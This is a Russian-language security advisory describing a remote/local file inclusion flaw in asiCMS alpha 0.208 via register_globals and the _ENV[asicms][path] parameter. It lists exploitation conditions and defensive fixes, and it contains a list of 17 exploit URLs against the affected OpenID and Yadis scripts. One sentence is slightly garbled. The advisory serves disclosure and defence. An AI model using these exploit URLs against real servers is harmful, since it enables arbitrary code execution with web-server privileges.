Хакер #305. Многошаговые SQL-инъекции
Программа: asiCMS alpha 0.208
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе (включение файла, RFI/LFI). Уязвимость существует из-за того, что перечисленные ниже сценарии, по-видимому, строят путь для include/require из значения `$_ENV['asicms']['path']` и не проверяют его; при включенной директиве register_globals это значение перезаписывается параметром запроса `_ENV[asicms][path]`, что видно по приведенным ниже URL. Затронуты сценарии
входных данных сценариями classes/Auth/OpenID/Association.php, classes/Auth/OpenID/BigMath.php,
classes/Auth/OpenID/DiffieHellman.php, classes/Auth/OpenID/DumbStore.php,
classes/Auth/OpenID/Extension.php, classes/Auth/OpenID/FileStore.php, classes/Auth/OpenID/HMAC.php,
classes/Auth/OpenID/MemcachedStore.php, classes/Auth/OpenID/Message.php, classes/Auth/OpenID/Nonce.php,
classes/Auth/OpenID/SQLStore.php, classes/Auth/OpenID/SReg.php, classes/Auth/OpenID/TrustRoot.php,
classes/Auth/OpenID/URINorm.php, classes/Auth/Yadis/XRDS.php, classes/Auth/Yadis/XRI.php
и classes/Auth/Yadis/XRIRes.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера. Условия эксплуатации (исходя из вида эксплоита): в конфигурации PHP должна быть включена директива register_globals, чтобы параметр `_ENV[asicms][path]` из строки запроса попал в суперглобальный массив; для включения файла с удаленного узла дополнительно требуется allow_url_fopen (в PHP 5.2+ также allow_url_include), иначе атака ограничивается включением локальных файлов. Сценарии из каталога classes/ должны быть доступны напрямую через Web сервер, без проверки того, что они вызваны из самой CMS. Защитные меры: отключить register_globals, запретить прямой доступ к classes/ на уровне Web сервера и задавать базовый путь константой в коде, а не читать его из окружения.
Эксплоит (значение параметра `_ENV[asicms][path]` оставлено пустым; при эксплуатации в него подставляется URL или локальный путь к контролируемому атакующим файлу, который сценарий затем включит):
http://localhost/[path]/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=
http://localhost/[path]/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=